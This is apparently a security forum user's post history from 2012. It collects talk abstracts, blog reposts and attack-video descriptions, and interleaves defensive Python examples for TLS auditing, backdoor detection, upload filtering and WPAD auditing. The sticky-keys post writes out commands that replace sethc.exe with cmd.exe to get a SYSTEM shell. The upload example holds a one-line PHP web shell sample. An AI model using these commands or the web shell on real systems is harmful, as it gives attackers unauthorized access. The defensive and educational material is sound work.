Everything posted by Nytro
-
Terrorists Win - Exploiting Telecommunications Data Retention
Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes.
In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks.
Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack" problem that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adopted strategies suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem.
Authors: Kay Hamacher, Stefan Katzenbeisser. Submitted: May 01, 2012.
Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4
Source: IT Security and Hacking knowledge base - SecDocs
-
Windows 8 Forensic Guide. Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf
-
[h=1]SyScan 2012 Singapore[/h]
Day1-1 Chris Valasek & Tarjei Mandt
Day1-2 Loukas Kalenderidis
Day1-3 Ryan MacArhur & Beist
Day1-4 Aaron LeMasters
Day1-5 James Burton
Day1-6 Jon Oberheide
Day2-6 Alex Ionescu
Day2-7 Stefan Esser
Day2-8 Brett Moore
Day2-9 Paul Craig
Day2-10 Edgar Barbosa
Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/
-
[h=1]Skype-iplookup[/h] Performs an obscure IP lookup for online Skype accounts. Can find local and remote IP addresses. Requires a cracked SkypeKit with deobfuscated debug logs. Online: http://skype-ip-finder.tk/ Source code: https://github.com/zhovner/Skype-iplookup
-
[h=3]Announcing SSL Pulse[/h]
[h=2]April 30, 2012[/h]
Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet.
SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month's results become available, we will start to show historic values and hopefully see improvements for each data point.
So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation (8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis.
The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults.
Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites).
As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application.
Posted by Ivan Ristić at 16:36:44 in SSL, TIM
Source: Ivan Ristić: Announcing SSL Pulse
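The post counts three configuration problems (legacy renegotiation, BEAST exposure, missing HSTS) plus weak keys. The script below is an added example, not SSL Labs code and not the SSL Pulse grading: it models a server's TLS settings as plain data and reports those same data points, with one constructed "insecure defaults" configuration and one hardened configuration. The thresholds (RSA below 2048 bits counts as weak, any RC4 suite is flagged) are this example's own choices. BEAST is reported when SSL 3.0 or TLS 1.0 is enabled and a CBC suite can be negotiated there; the 2012-era workaround of preferring RC4 suppresses that finding but is itself flagged, since RC4 is broken.

```python
"""Added example: flag the SSL Pulse data points in a TLS server configuration."""
from dataclasses import dataclass


@dataclass(frozen=True)
class TlsConfig:
    protocols: tuple            # enabled protocol versions
    ciphers: tuple              # OpenSSL-style names in server preference order
    server_prefers_order: bool  # server cipher order is honoured
    secure_renegotiation: bool  # RFC 5746 renegotiation_info supported
    client_renegotiation: bool  # client-initiated (legacy) renegotiation allowed
    hsts_max_age: int           # Strict-Transport-Security max-age, 0 = no header
    key_bits: int               # RSA modulus size


LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1"}


def cipher_mode(name):
    """Classify an OpenSSL cipher name as 'aead', 'stream' (RC4) or 'cbc'."""
    upper = name.upper()
    if any(tag in upper for tag in ("GCM", "CCM", "CHACHA20")):
        return "aead"
    if "RC4" in upper:
        return "stream"
    return "cbc"


def assess(cfg):
    """Return a sorted list of finding codes for the configuration."""
    findings = set()

    # Renegotiation is only safe with RFC 5746; the legacy form lets an
    # attacker splice a chosen request prefix into a victim's session.
    if cfg.client_renegotiation and not cfg.secure_renegotiation:
        findings.add("insecure-renegotiation")

    # BEAST is a chosen-plaintext attack on CBC suites under SSL 3.0/TLS 1.0.
    # AEAD suites require TLS 1.2, so a TLS 1.0 client chooses among the CBC
    # and RC4 suites only; exposure remains unless a CBC suite cannot win there.
    if LEGACY_PROTOCOLS & set(cfg.protocols):
        legacy_choices = [c for c in cfg.ciphers if cipher_mode(c) != "aead"]
        cbc_reachable = any(cipher_mode(c) == "cbc" for c in legacy_choices)
        rc4_first = bool(cfg.server_prefers_order and legacy_choices
                         and cipher_mode(legacy_choices[0]) == "stream")
        if cbc_reachable and not rc4_first:
            findings.add("beast")
    # RC4 was the 2012 workaround for BEAST but is broken in its own right.
    if any(cipher_mode(c) == "stream" for c in cfg.ciphers):
        findings.add("rc4-enabled")

    if cfg.hsts_max_age <= 0:
        findings.add("hsts-missing")
    if cfg.key_bits < 2048:          # threshold chosen for this example
        findings.add("weak-key")
    return sorted(findings)


# Constructed sample: the fresh install with insecure defaults the post warns about.
WEAK = TlsConfig(
    protocols=("SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2"),
    ciphers=("AES128-SHA", "RC4-SHA", "ECDHE-RSA-AES128-GCM-SHA256"),
    server_prefers_order=False,
    secure_renegotiation=False,
    client_renegotiation=True,
    hsts_max_age=0,
    key_bits=1024,
)

# Constructed sample: the same server after applying the deployment advice.
HARDENED = TlsConfig(
    protocols=("TLSv1.2", "TLSv1.3"),
    ciphers=("TLS_AES_256_GCM_SHA384", "ECDHE-RSA-AES128-GCM-SHA256",
             "ECDHE-RSA-CHACHA20-POLY1305"),
    server_prefers_order=True,
    secure_renegotiation=True,
    client_renegotiation=False,
    hsts_max_age=31536000,
    key_bits=2048,
)

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, assess(cfg) or ["clean"])
```

To use it against a real server, fill a TlsConfig from the output of a scanner or from the server's own configuration; the findings map one to one onto the counts in the post.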
-
[h=1]Oracle discloses new zero day exploit and launches JDK for OS X[/h]
by Chester Wisniewski on May 1, 2012
While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are an Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable.
This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008, saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it?
If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disable it entirely if it isn't needed in your environment.
In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple.
Update: At approximately the same time as this article was posted Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant.
Source: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security
-
[h=3]Privilege Escalation via "Sticky" Keys[/h]
[h=2]Monday, April 30, 2012[/h]
This has been documented all over, but I like things to be on the blog so I can find them...
You can gain a SYSTEM shell on an application you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and can change files.
Make a copy somewhere of the original sethc.exe on the system:
    copy c:\windows\system32\sethc.exe c:\
    cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
Copy cmd.exe into sethc.exe's place:
    copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
or
    cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
Reboot, hit the Shift key 5 times, and a SYSTEM shell will pop up. Do your thing; it would probably be nice to put sethc.exe back when you are done.
Posted by CG at 12:10 PM
Source: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys
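The swap above leaves an easy artefact: an accessibility binary whose bytes are identical to cmd.exe. The script below is an added example (not from the Carnal0wnage post) that hashes the accessibility helpers reachable from the logon screen and compares them with the shells an attacker would copy over them. It works on a live System32 or on a mounted image, the offline case the post describes; the stand-in directory it builds when run without arguments is constructed for demonstration and contains fake files, not Windows binaries.

```python
"""Added example: detect a sticky-keys style swap of an accessibility binary."""
import hashlib
import os
import shutil
import tempfile

# Accessibility helpers Windows launches from the logon screen (sethc.exe is
# Sticky Keys; utilman.exe is Ease of Access, which launches the others).
ACCESSIBILITY = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                 "magnify.exe", "displayswitch.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def sha256_of(path):
    """Stream-hash a file so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_swapped_binaries(system32):
    """Return (accessibility_binary, shell_it_matches) pairs found in system32."""
    shell_hashes = {}
    for name in SHELLS:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            shell_hashes[sha256_of(path)] = name
    hits = []
    for name in ACCESSIBILITY:
        path = os.path.join(system32, name)
        if os.path.isfile(path):
            match = shell_hashes.get(sha256_of(path))
            if match:
                hits.append((name, match))
    return hits


def build_sample_system32():
    """Constructed stand-in for a System32 directory with sethc.exe swapped."""
    root = tempfile.mkdtemp(prefix="system32-")
    with open(os.path.join(root, "cmd.exe"), "wb") as handle:
        handle.write(b"MZ-constructed-cmd.exe-stand-in")
    with open(os.path.join(root, "utilman.exe"), "wb") as handle:
        handle.write(b"MZ-constructed-utilman.exe-stand-in")
    # The swap from the post: cmd.exe copied over sethc.exe.
    shutil.copyfile(os.path.join(root, "cmd.exe"), os.path.join(root, "sethc.exe"))
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_system32()
    for victim, shell in find_swapped_binaries(target):
        print(f"{victim} has the same SHA-256 as {shell}: probable backdoor")
```

Run it as `python check_sethc.py C:\Windows\System32` on the live box or `python check_sethc.py /mnt/sda3/Windows/System32` against the mounted disk. A hash match is not the only variant: the same effect is reached with a Debugger value under the Image File Execution Options key for sethc.exe, which leaves the file untouched, so check that key as well.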
-
[h=4]Arp/Dns Spoofing Steal Facebook Password (Lan Environment)[/h] Description: In this video I'll show you how an attacker can steal user credentials of every site (in this case it will be Facebook) in a LAN environment. First of all we use SET to clone the current Facebook home page and ... Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment) Follow Me: https://twitter.com/#!/SecObscurity Source: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)
-
[h=4]Stealing Http Sessions With Sessionlist[/h] Description: I run through a quick demo of how to use sessionlist to sniff http session traffic. Following that I use a simple firefox plugin to spoof the data acquired to show full access to the logged in user. Target demo site is facebook.com Download:
-
[h=4]Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.[/h] Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020). Victim: Windows Server 2006 x86 Enterprise Edition. Source: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.
-
[h=4]Athcon 2011 Exploiting Anti-Reversing Techniques[/h] Description: AthCon IT Security Conference. Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization. Speaker: Kyriakos Economou. Source: Athcon 2011 Exploiting Anti-Reversing Techniques
-
Nytro posted a topic in Tutoriale video (Video tutorials)
[h=4]Microsoft Windows Eot Font Table Directory Integer Overflow.[/h] Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. Source: Microsoft Windows Eot Font Table Directory Integer Overflow.
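The description names the bug class but not the mechanism, so here is an added illustration of how an integer overflow in table-directory handling defeats a bounds check. An EOT file wraps a TrueType/OpenType font whose table directory is a uint16 table count followed by 16-byte records (tag, checksum, offset, length). A native parser that validates `offset + length <= size` in 32-bit arithmetic accepts a record whose sum wraps past 2**32, and the bogus length then feeds a copy or allocation that runs off the buffer, which in kernel mode is the BSoD the module triggers. This is example code, not the win32k code path or the Metasploit module; Python integers do not wrap, so the 32-bit truncation of the vulnerable check is emulated explicitly with a mask.

```python
"""Added example: bounds-check integer overflow in a font table directory."""
import struct

MASK32 = 0xFFFFFFFF
RECORD = struct.Struct(">4sIII")   # tag, checkSum, offset, length (big-endian)
HEADER = struct.Struct(">IHHHH")   # sfntVersion, numTables, searchRange, entrySelector, rangeShift


def build_directory(records):
    """Serialize (tag, offset, length) records after the 12-byte offset table."""
    header = HEADER.pack(0x00010000, len(records), 0, 0, 0)
    body = b"".join(RECORD.pack(tag, 0, offset, length) for tag, offset, length in records)
    return header + body


def parse_directory(blob, checked):
    """Return the (tag, offset, length) records the parser accepts.

    checked=False reproduces the overflow-prone check a native parser might
    do in 32-bit arithmetic; checked=True rejects any record whose extent
    cannot be represented without wrapping.
    """
    size = len(blob)
    _, num_tables, _, _, _ = HEADER.unpack_from(blob, 0)
    pos = HEADER.size
    accepted = []
    for _ in range(num_tables):
        if pos + RECORD.size > size:
            raise ValueError("truncated table directory")
        tag, _, offset, length = RECORD.unpack_from(blob, pos)
        pos += RECORD.size
        if checked:
            # Subtract rather than add: no intermediate value can overflow.
            ok = offset <= size and length <= size - offset
        else:
            # Emulated uint32 addition: offset + length wraps for sums >= 2**32.
            ok = ((offset + length) & MASK32) <= size
        if ok:
            accepted.append((tag, offset, length))
    return accepted


# Constructed sample: one legitimate record covering the whole 44-byte blob and
# one whose offset + length wraps to 8, so the unchecked parser accepts a
# table that claims to be almost 4 GiB long.
SAMPLE = build_directory([(b"head", 0, 44), (b"glyf", 16, 0xFFFFFFF8)])

if __name__ == "__main__":
    print("vulnerable check accepts:", [t for t, _, _ in parse_directory(SAMPLE, checked=False)])
    print("hardened check accepts:  ", [t for t, _, _ in parse_directory(SAMPLE, checked=True)])
```

The same subtract-instead-of-add rule applies to every offset/length pair in a binary format: compute `size - offset` first, and reject any length larger than that remainder.
-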
[h=4]Intersect Framework :: Install Persistent Backdoors[/h] Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files). Intersect homepage: http://github.com/ohdae/Intersect-2.5/ Source: Intersect Framework :: Install Persistent Backdoors
-
[h=4]Social Engineer-Toolkit And Windows Credentials Editor[/h] Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett Source: Social Engineer-Toolkit And Windows Credentials Editor
-
[h=4]Spoofing Dns With Nmap Fast Track Script[/h] http://www.youtube.com/watch?v=uAfk-_j-EUM&feature=player_embedded Description: spoofing DNS - spoof all websites with the nmap fast track script: www.4shared.com/rar/4n4nYdcO/nmapf.html Source: Spoofing Dns With Nmap Fast Track Script
-
[h=4]Dos Attack On Win8 With Hping3 (Packet Flooding)[/h] Description: DoS attack on Win8 with hping3 (packet flooding). Source: Dos Attack On Win8 With Hping3 (Packet Flooding)
-
[h=4]Arbitrary File Upload And Bypassing Protections(Dvwa)[/h] Description: In this demo we bypass upload protections to upload an arbitrary file, demonstrating how the file upload protection techniques used in DVWA can be bypassed. Source: Arbitrary File Upload And Bypassing Protections(Dvwa)
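The filters such videos defeat trust what the client sends: the Content-Type header and the file name. As an added example, not DVWA's PHP source, the following shows that weak check next to a hardened one that inspects the bytes, takes only the final extension from an allowlist and never reuses the client's name. The magic-byte table and the size limit are this example's own; storing under a random name is what stops `shell.php.png` style double extensions from ever reaching a PHP handler.

```python
"""Added example: a bypassable upload filter beside a hardened replacement."""
import os
import secrets

# Allowed extensions and the leading bytes a genuine file of that type carries.
ALLOWED_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024   # size cap chosen for this example


def weak_accepts(filename, content_type):
    """The kind of check an upload bypass defeats: it trusts the client-supplied
    Content-Type header and looks for an image extension anywhere in the name,
    so 'shell.jpg.php' sent as image/jpeg passes."""
    name = filename.lower()
    return content_type in ("image/png", "image/jpeg", "image/gif") and any(
        marker in name for marker in (".png", ".jpg", ".jpeg", ".gif"))


def hardened_storage_name(filename, data):
    """Return a random storage name with an allowlisted extension, or None."""
    if len(data) > MAX_BYTES:
        return None
    # Only the final extension counts, and it must be on the allowlist.
    ext = os.path.splitext(filename.lower())[1].lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    magic = ALLOWED_MAGIC.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    # The client's name never reaches disk: a PNG/PHP polyglot uploaded as
    # shell.php.png is stored as <random>.png, with the extension taken from
    # the allowlist rather than from the request.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample uploads.
    php_shell = b"<?php system($_GET['c']); ?>"
    polyglot = ALLOWED_MAGIC["png"] + php_shell
    print("weak filter, shell.jpg.php as image/jpeg:", weak_accepts("shell.jpg.php", "image/jpeg"))
    print("hardened, shell.jpg.php:", hardened_storage_name("shell.jpg.php", php_shell))
    print("hardened, shell.php.png polyglot:", hardened_storage_name("shell.php.png", polyglot))
```

A polyglot that passes the magic check is still stored, so the upload directory must not execute scripts (no PHP handler, no execute permission) and images that are served back should be re-encoded with an image library rather than copied through, which strips embedded payloads.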
-
[h=4]Dns Spoofing Plus Wpad Equals Compromised[/h] Description: [[Web found; this is not my video but I wanted to share it with securitytube]] How hard is it for someone to insert a proxy between you and the rest of the Internet without you knowing? Will running a Mac or Linux protect you? In this episode we combine the concepts from Episode 20 with the WPAD style attack that was discussed back in Episode 17, creating a quick and easy how-to when it comes to creating a man in the middle attack that will work against any system that has Automatic Proxy Discovery enabled. This feature is sometimes thought to be a Windows specific issue, but as we demonstrate here by transparently creating a man in the middle proxy for a Mac, it really does apply everywhere. There are just a few simple pieces that you need to accomplish this attack and there are some quick and easy things that you can do to defend yourself or that you can look for during an audit. For more details and a link to the source code, please check the blog article here: IT Security Audit: What About WPAD? Source: Dns Spoofing Plus Wpad Equals Compromised
-
[h=4]Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks![/h] Description: [[Web found; I did not make this video but wanted to share it with securitytube]] WPAD is a terrific protocol for ease of configuration, but it's also a phenomenal protocol for hackers and penetration testers. This short video will describe the issue, demonstrate how it's exploited and give you quick and easy suggestions that you can use to protect your business network or protect yourself personally when you're using your web browser in Starbucks or McDonald's! For more demonstrations, tips and tricks, visit Auditcasts. For an in-depth discussion of this issue and how to solve it, visit http://audit.sans.org/blog Source: Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks!
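Both WPAD videos above rest on the same two facts: a client with auto-detection enabled asks DNS for a host called wpad in its own domain and fetches http://wpad.<domain>/wpad.dat, and whatever proxy that PAC script returns gets all the client's web traffic. The code below is an added example (not from either video or the SANS post) for the audit side: it lists the wpad names a client would walk for a given host name, and it extracts the proxies a PAC script can return so they can be compared with the proxies an organisation actually runs. The devolution rule that stops at the second-level name is an assumption of this example, and the rogue wpad.dat is a constructed sample.

```python
"""Added example: audit helpers for WPAD name devolution and PAC proxy targets."""
import re

# "PROXY host:port" directives; DIRECT and SOCKS entries are ignored here.
PROXY_RE = re.compile(r"\bPROXY\s+([A-Za-z0-9.\-]+):(\d+)")


def wpad_candidates(fqdn, stop_labels=2):
    """DNS names a WPAD client walks for a host named `fqdn`, most specific first.

    Assumption for this example: the walk stops once only `stop_labels` labels
    remain, so wpad.example.com is tried and wpad.com is not.
    """
    labels = fqdn.lower().strip(".").split(".")[1:]   # drop the host's own label
    names = []
    while len(labels) >= stop_labels:
        names.append("wpad." + ".".join(labels))
        labels = labels[1:]
    return names


def pac_proxies(pac_text):
    """Proxy endpoints a PAC script can hand to the browser, sorted."""
    return sorted({f"{host}:{port}" for host, port in PROXY_RE.findall(pac_text)})


def audit_pac(pac_text, allowed):
    """Proxies named in the PAC that are not on the organisation's allowlist."""
    return [proxy for proxy in pac_proxies(pac_text) if proxy not in allowed]


# Constructed sample: the wpad.dat an attacker serves after winning the wpad
# name on the LAN. Plain hostnames go direct, everything else via 10.0.0.66.
ROGUE_PAC = """function FindProxyForURL(url, host) {
    if (isPlainHostName(host)) return "DIRECT";
    return "PROXY 10.0.0.66:8080; DIRECT";
}"""

if __name__ == "__main__":
    print(wpad_candidates("pc1.sales.corp.example.com"))
    print(audit_pac(ROGUE_PAC, {"proxy.corp.example.com:3128"}))
```

For each name wpad_candidates returns, an audit resolves it and fetches /wpad.dat; any answer that is not the organisation's own PAC server, or any PAC whose audit_pac result is non-empty, is a finding. On the defensive side the same list tells you which names to register yourself in internal DNS so that nobody else can, and DHCP option 252, LLMNR and NetBIOS name resolution are the other channels a client falls back to when the DNS lookup fails.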
-
[h=4]Exploit Pack - Web Security 2.2[/h] http://www.youtube.com/watch?v=jCR5TSTmtJE&feature=player_embedded Description: Exploit Pack - Web Security. Take control of remote browsers, steal social network credentials, obtain persistence on remote browsers, distributed denial of service and more. Follow me on twitter: @exploitpack Skype me: juansacco Source: Exploit Pack - Web Security 2.2
-
[h=4]Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)[/h] Description: This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which is loaded after Office has loaded, so the malicious file must be opened through "File / Open" to achieve exploitation. Source: Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)